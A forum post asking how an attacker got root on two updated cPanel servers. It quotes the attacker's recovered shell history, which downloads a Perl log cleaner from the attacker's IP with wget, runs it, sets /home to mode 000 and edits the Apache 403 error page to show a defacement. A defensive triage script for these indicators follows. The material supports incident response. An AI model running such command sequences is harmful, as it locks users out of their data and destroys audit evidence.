On two completely different cpanel servers, the same hacker or team gained access... (from morocco)
Anyone had an idea how can this be possible?
The two servers were up2date (cpanel and OS), one of them had CSF/LFD (5.32) as well as being hardened in many ways, the other didn't have CSF, but was running suPHP.
On both, SSH was running on non-standard ports.
We already saw more than one with the same issue....
They basically... chmod 000 /home, and edit the 403 line of /usr/local/apache/conf/includes/errordocument.conf to show a hacked html, which is then shown on all websites running on the server. Then they run a "log cleaner".
First I thought it could be the CSF bug... but one of the servers didn't have it, and the other had it updated already...
We were looking around, and found the attacker IP (41.140.*) was, like, logged on the whm (per apache logs)...
but we still can't determine HOW they got root access.... both servers were updated, and running smoothly since the beginning... so we're afraid it could be a BUG that could affect other clients too.
I'm not saying it's a cpanel bug... I'm trying to find someone that could actually KNOW what they did, as most logs/history was deleted on this server, we found
Part of the History (as we logged in fast to the server, before they leave) was this:
14 cd /tmp
15 w
16 wget 41.140.110.54/log
17 pico /usr/local/apache/conf/includes/errordocument.conf
18 service httpd restart
19 ls -la /
20 chmod 000 /homechmod 000 /home
21 chmod 000 /home
22 chmod 000 /homechmod 000 /home2
23 chmod 000 /home2
24 perl log
25 perl log
(this last command is the one that clears the logs, and then they were just gone)
But we could see they got the file, what file they edited, etc.
Looks like this is the only damage done, but if this is a bug, they can actually do anything they want, as they were working as ROOT!
BTW a similar problem was found recently here:
https://forums.cpanel.net/f5/hacking-attempt-problem-help-210052.html
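The script below is an added example, not part of the original post or of cPanel: a small triage script that checks a server (or a mounted copy of its disk) for the three indicators described above, home directories set to mode 000, an ErrorDocument 403 line rewritten to serve defacement HTML, and the downloaded Perl "log cleaner" left in /tmp. It assumes the stock cPanel 403 directive points at a local path beginning with `/` (an assumption, confirm against a clean server); every path is an argument so nothing is hard-coded.

```shell
#!/bin/sh
# Triage checks for the indicators in the post above (added example).
# Paths are arguments so the checks can run against a mounted image.

# 1. Home directory locked with `chmod 000` (prints LOCKED, returns 0).
check_home_locked() {
    dir="$1"
    # GNU stat first, BSD stat as fallback; mode 000 prints as "0".
    mode=$(stat -c '%a' "$dir" 2>/dev/null || stat -f '%Lp' "$dir")
    if [ "$mode" = "0" ]; then
        echo "LOCKED: $dir is mode 000"; return 0
    fi
    echo "ok: $dir is mode $mode"; return 1
}

# 2. ErrorDocument 403 no longer a local path (inline "<html>..." text
#    or a URL is what a defacement looks like). Returns 0 if suspicious.
#    Assumption: a clean cPanel box uses a /path target here.
check_403_directive() {
    conf="$1"
    line=$(grep -E '^[[:space:]]*ErrorDocument[[:space:]]+403[[:space:]]' "$conf" | head -n 1)
    if [ -z "$line" ]; then
        echo "note: no ErrorDocument 403 line in $conf"; return 1
    fi
    # Drop the first two fields to keep only the directive's target.
    target=$(printf '%s\n' "$line" | awk '{ $1=""; $2=""; sub(/^[ \t]+/, ""); print }')
    case "$target" in
        /*) echo "ok: 403 -> $target"; return 1 ;;
        *)  echo "SUSPICIOUS: 403 -> $target"; return 0 ;;
    esac
}

# 3. The fetched "log" file in the given directory (the post shows
#    `wget .../log` then `perl log` in /tmp). Returns 0 if it looks like
#    a Perl log cleaner (perl shebang, or unlink / /var/log references).
check_tmp_cleaner() {
    f="$1/log"
    [ -f "$f" ] || { echo "ok: no $f"; return 1; }
    if head -n 1 "$f" | grep -q 'perl' || grep -Eq 'unlink|/var/log' "$f"; then
        echo "SUSPICIOUS: $f looks like a log cleaner"; return 0
    fi
    echo "note: $f present but not obviously a perl script"; return 1
}
```

Run as e.g. `check_home_locked /home; check_403_directive /usr/local/apache/conf/includes/errordocument.conf; check_tmp_cleaner /tmp`; a non-zero exit from all three means none of the described indicators were found, which does not prove the box is clean.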